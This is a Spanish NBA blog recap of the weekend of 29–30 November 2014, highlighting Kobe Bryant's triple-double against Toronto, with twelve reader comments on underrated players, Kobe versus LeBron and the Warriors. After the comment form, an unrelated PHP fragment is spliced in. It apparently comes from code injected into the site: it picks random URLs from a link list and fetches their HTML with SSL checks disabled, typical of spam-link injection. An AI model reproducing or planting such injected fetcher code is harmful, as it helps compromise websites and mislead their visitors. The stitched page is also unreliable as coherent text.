Mini-informe del fin de semana: Eterno Kobe Bryant

01 de December de 2014 por txusma

El sábado os dejamos la crónica de lo que sucedió la noche de “Acción de Gracias” y hoy toca repasar lo que dio de sí la liga el sábado y el domingo. Si me he de quedar con alguna cosa de estos dos días destacaría el monumental triple-doble de Kobe Bryant que permitió ayer a los Lakers conseguir su tercera victoria ante equipos del Este. Esta vez ante el líder, los Toronto Raptors. Todo un aviso para navegantes a aquellos que piensan que el futuro HoF está acabado o cerca de permitir que los suyos se dejen llevar. Si hablamos de Kobe, mientras hay sangre, hay partido.

Pero empecemos por el sábado que se resolvió sin ninguna sorpresa destacable. Los Sixers acumularon su 16a derrota consecutiva ante los Mavs y están ya a solo 2 de igualar el récord de mayor números de partidos consecutivos perdiendo a principio de temporada que ostentan los lamentables Nets de la 2009-2010. Ojo al dato: Philadelphia solo ha ganado 4 de sus últimos 52 partidos.

Los Cavaliers se impusieron a los Pacers de la mano de un Kevin Love que se fue a los 28 puntos, récord de la temporada. El ataque de Cleveland se mostró más fluido pero la defensa todavía ha de mejorar bastante. Clippers y Rockets también ganaron. Los primeros fácil a Utah y los segundos a los sorprendentes Milwaukee Bucks. Los de Paul y Griffin han ganado 6 de los 7 partidos consecutivos jugados fuera de casa, una muestra de carácter y energía. Por su parte, Houston sacó el partido adelante sin Dwight Howard, Terrence Jones y Patrick Beverly. A James Harden la ayuda le llegó sobre todo por parte del veterano Jason Terry.

Los Wizards se impusieron a los Pelicans en un partido feo de anotación y los Hawks le endosaron una soberana paliza a unos Hornets que no se parecen en nada a los de la temporada pasada. Novena derrota consecutiva y primeros rumores de problemas con Lance Stephenson. ¿Alguien se sorprende?

Como ya hemos comentado lo más espectacular del domingo fue el partidazo del “abuelo” Kobe Bryant. Tras 19 años de carrera, el escolta de los Lakers consiguó su vigésimo triple-doble y se convertió en el jugador más veterano en conseguir más de 30 puntos, 10 rebotes y 10 asistencias en un partido superando a un mito como Larry Bird que a los 35 todavía seguía dando lecciones. Además, también se convirtió en el primer jugador en la historia que supera los 30.000 puntos y las 6.000 asistencias. Los Raptors jugaron sin DeMar DeRozan y se vieron superados en la prórroga desde el primer momento.

La jornada la había abierto horas antes un Spurs – Celtics que los campeones resolvieron en los últimos 10 minutos y un Chicago – Brooklyn que los de Illinois sacaron adelante con Jimmy Butler y Pau Gasol tocando la guitarra. Después llegó el turno de los dos mejores equipos del Oeste. Los Warriors se impusieron a unos descabezados y disfuncionales Pistons y los Grizzlies se aprovecharon de la baja de DeMarcus Cousins para apuntarse una cómoda victoria ante los Kings.

También fue una jornada de retornos. Dwyane Wade y Carmelo Anthony volvieron a las canchas tras sus respectivas lesiones para brindarnos un par de excelentes actuaciones. El gato al agua se lo llevaron los Heat, que dominaron el partido de principio a fin aunque nunca consiguieron despegarse en el marcador.

La sorpresa del día la protagonizaron los Magic venciendo a los Suns a domicilio. Orlando llegó a ganar por 16 al principio del último cuarto pero los de Arizona fueron capaces de ponerse a un solo punto a falta de 2 segundos. Hasta ahí llegó el intento de remontada de un equipo que se muestra demasiado irregular.

Para cerrar la jornada los Blazers nos dejaron otra victoria más sudada de lo esperado ante unos Wolves muy afectados por las lesiones. Wesley Matthews acabó el partido con 6 triples (3er partido consecutivo en que anota 5 o más) y Shabazz Muhamaad sigue aprovechando las oportunidades.

Top 10

Comenta

12 comentarios a esta entrada

  1. Lucho dice:
    #1

    El sábado nba.com preguntó por el jugador más subvalorado de la liga. A quien votarían ustedes?

    Ya que estamos hablando de Kobe, lei que recibió varios votos. Mas alla de que obviamente no lo sea, si me parece que esta bastante subvalorado, como también Marc Gasol. Aunque todos coincidimos en que es un crack, se lee demasiado seguido que es alguien egoista y que juega solo para él y que solo hace puntos (no me refiero específicamente al blog, hablo en general). Uno lee y parece que LeBron ya es mucho mejor que él históricamente, y aunque a futuro estamos seguros de que lo va a ser, no estoy tan seguro de que con sus carreras a día de hoy ya lo sea

      Citar

  2. Nacho dice:
    #2

    Coincido, Lucho.
    Que un tipo que mete más de 30.000 puntos, de más de 6.000 asistencias ya dice mucho. Cierto que nos ha desesperado muchas veces, pero como también se ha dicho aquí (creo que Magic) muchas veces ha pecado de egoísmo por deserción de los suyos.
    Marc puede ser infravalorado porque aburre (a sus rivales) y no es saltarín. Pero a él le va bien ese papel, y sabe aprovecharse de él.
    Ayer vi la segunda parte de SAS y el Bulls/Nets.
    Los campeones juegan y cuando lo necesitan aprietan y se van. Cada día es uno el que lleva la batuta anotadora y todos suman. Siguen siendo el equipo con mayúsculas de siempre. Falta que entre en dinámica Belinelli, al que parece que la lesión lo ha dejado un poco tocadín. Y aunque no sea del agrado de muchos, la vuelta de Splitter le va a dar un plus muy importante, porque el brasileño es de esos jugadores que va creciendo año a año y esperamos que su aportación sea mayor.
    Algo parecido les pasó a los Bulls. aceleran cuando lo necesitan, y se van. Lo de Butler y Pau empieza a ser escandaloso, porque son de esos tíos que no te avisan. Te clavan 20 puntos, se hincha a coger rebotes uno, y a morder y correr el otro y cuando quieres darte cuenta vas 15 abajo. Ayer se sumó Mirotic (que buenos minutos está dando en ausencia de Gibson) y un Rose que tras una mala primera parte tuvo en el tercer cuarto momentos mágicos. Aaron Brooks desespera y enamora a partes iguales, y eso le da chispa a un equipo demasiado ‘recto’.
    Lo de los Nets es de expediente-X, o los tíos (Deron, JJ, KG… Hollins) nos han tenido engañados todos estos años, cosa que no creo. Porque van y bien y no son constantes. Yo pensaba que el bueno de Lionel iba a dar esa impronta al equipo. La esperaremos. Bogdanovic es la única noticia positiva para el equipo. Ha llegado para quedarse, y responde. Y cuidado, que es un tipo que no rehuye la responsabilidad, y como los veteranos no se apliquen él les puede coger el testigo.

      Citar

  3. txusma dice:
    #3

    Pues no ha de hacer cosas todavía Lebron James para ponerse al mismo nivel histórico que Kobe Bryant. De los jugadores actual el único que le puede mirar a la cara en ese aspecto es Tim Duncan.

      Citar

  4. Azabel dice:
    #4

    a kobe le pasa como a varios y es la “maldicion del contrato”,

    es decir, ese jugador es bueno, es muy bueno, me encanta, cuanto cobra al año? 20 kilos al año? ya no me parece tan bueno…

    y a kobe le esta pasando, si en lugar de la millonada que cobra, tuviera un contrato de 10 o 12 millo es y hubise permitido armar un mejor equipo a su al rededor, se lo veria de otra forma

    es un caso extraño ver la planilla de salarios de los lakers, kobe sobrepagado no por nivel sino por edad podria haber aceptado 10 millones menos, nash cobrando 9 millones sion jugar, hill cobrando 9 millones, cuando 3 seria su precio, y Lin cobrando 8 y pico cuando tendria que cobrar 5

    cobrando lo que cada uno deberia, los Lakers tendrian 30 millones de espacio extra aun con este plantel

      Citar

  5. Lucho dice:
    #5

    Gracias Nacho

    Quienes mas piensan que estan subvalorados? Y el mas subvalorado quien es??

      Citar

  6. rumbero dice:
    #6

    Más que infravalorado, lo que pasa con Kobe es que tiene mucho hater, como les pasa a casi todos los que son muy buenos. Que si tira mucho, que si cobra más..pero pocos te negarán que ha sido/es uno de los mejores. Parker sería uno de los grandes infravalorados de la liga. A otro nivel me lo parecen Hordford, Conley, Matthews, Lowry … gente que no tiene el nível mediático de un JR Smith o el nombre de un Deron Williams pero que llevan mucho tiempo haciéndolo bien.

    Yo al que tengo en un altar es a Curry. Es una pasada este chaval. Y eso que ayer no lo vi ni media hora ante los Pistons (no me extraña porque menuda banda…tendremos que esperar al Hope for Detroit volumen XVI). La verdad es que estos Warriors pintan mejor que nunca. Sobreviven bien cuando no juega Curry, Barnes ha vuelto a coger protagonismo (a costa de un Iguodala bastante gris), Thompson se está consagrando y lo de Speights habrá que verlo con el tiempo porque está haciendo partidos que son una locura. Y luego tienen a otro tio que entraría en la lista de pocos valorado como Draymond Green que lo hace casi todo bien.

      Citar

  7. MagicJohnson32 dice:
    #7

    rumbero:

    Yo al que tengo en un altar es a Curry. Es una pasada este chaval. Y eso que ayer no lo vi ni media hora ante los Pistons (no me extraña porque menuda banda…tendremos que esperar al Hope for Detroit volumen XVI). La verdad es que estos Warriors pintan mejor que nunca. Sobreviven bien cuando no juega Curry, Barnes ha vuelto a coger protagonismo (a costa de un Iguodala bastante gris), Thompson se está consagrando y lo de Speights habrá que verlo con el tiempo porque está haciendo partidos que son una locura. Y luego tienen a otro tio que entraría en la lista de pocos valorado como Draymond Green que lo hace casi todo bien.

    Sensacional la pareja Green – Speights, está elevando a los Warriors un escalón por encima de lo que suponía.

    Y ojo, que no mencionas a Bogut pero está gigante en defensa. Es fundamental para entender a los Warriors como candidatos.

    Y todo esto, sin David Lee y con un Iggy absolutamente inepto en ataque.

      Citar

  8. Ruxixón dice:
    #8

    Bogut implecable en defensa pero también en ataque,ya no tirando,que asume pocos tiros (y diría que él encantado) si no a la hora de contribuir a la circulación,y probablemente las 3.3 asistencias por partido digan poco para lo que ayuda,pero si comparamos con el resto de centers de la competición está a la altura de Noah.

    Sobre eso que comenta Nacho de los Nets,me gustaría destacar que lo más positivo de la temporada es la aportación de Bogdanovic.Y estamos hablando de un equipo que debe aspirar a PO,que tiene a Deron Williams,a JoJo,a Brook Lopez…yo también esperaba algo más de ellos,principalmente por la llegada de Hollins,pero creo que falta un líder en ese roster (KG está jubilado),alguien que meta hambre a los veteranos.Lo que vengo a decir es que ese proyecto tiene que girar ya hacia la reconstrucción,traspasar al mayor activo que tienen que es Brook (duele ver un pívot con esa cantidad de rebotes) por jugadores jóvenes y darles cancha mientras agotan los contratos de las vacas sagradas,y estar en buena disposición para el próximo ciclo del equipo.

      Citar

  9. rumbero dice:
    #9

    Pues si, no mencioné a Bogut y seguramente sea después de Curry al que más van a necesitar en PO. Será porque ya lo veo con alguna lesión cuando llegue lo bueno, esperemos que no. Y muy cierto lo que apunta Ruxixón. Bogut es un tipo listo jugando a esto y Kerr lo está aprovechando en la circulación de balón y los pick n rolls. Por ejemplo, el otro día no se a quién le leía que con él en pista los Warriors tiran por encima del 40% en triples y sin él un 30%.

      Citar

  10. Lucho dice:
    #10

    Rumbero, disiento. El hater de LeBron (que tiene muchisimos) se limita a decir que es un jugador que le cae mal, no lo discute basketbolisticamente. El de Kobe si trata de demostrar que es menos jugador de lo que se cree. Son dos cosas totalmente opuesta. Ojo, para mi.

    Coincido, soy fan de Curry. Y si, Tony Parker es el jugador mas infravalorado de toda la NBA probablemente

      Citar

  11. rumbero dice:
    #11

    Lucho:
    Rumbero, disiento. El hater de LeBron (que tiene muchisimos) se limita a decir que es un jugador que le cae mal, no lo discute basketbolisticamente. El de Kobe si trata de demostrar que es menos jugador de lo que se cree. Son dos cosas totalmente opuesta. Ojo, para mi.

    Puede ser Lucho, pero a mi me da la impresión que de Lebron también se han dicho cosas a nivel baloncestístico. Que si es sólo físico, que sin estrellas al lado nunca ha ganado nada… De hecho muchos de esos fantasmas desaparecen con el último anillo que gana, pero ojo que si Allen no mete ese triple, me se de unos cuantos que ya estábamos (estaban perdón :D) afilando cuchillos para decir que James no es jugador para cerrar partidos. En cualquier caso tendremos que esperar a que Lebron tenga 36 primaveras y comparar las cosas bonitas que se dicen de él con las de Kobe

      Citar

  12. Lucho dice:
    #12

    Si puede que tengas razon. Si ese triple de Allen no hubiese entrado, la de boludeces que estarian diciendo contra LeBron hoy en dia, aunque su actuacion haya sido exactamente la misma. Se hablaria de que un solo anillo es muy poco en ese equipo, bla, bla, bla.
    Yo no soy fan de ninguno de los dos, ni cerca estoy de serlo. Pero una cosa es hablar de un gusto personal y otra opinar sin criterio

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>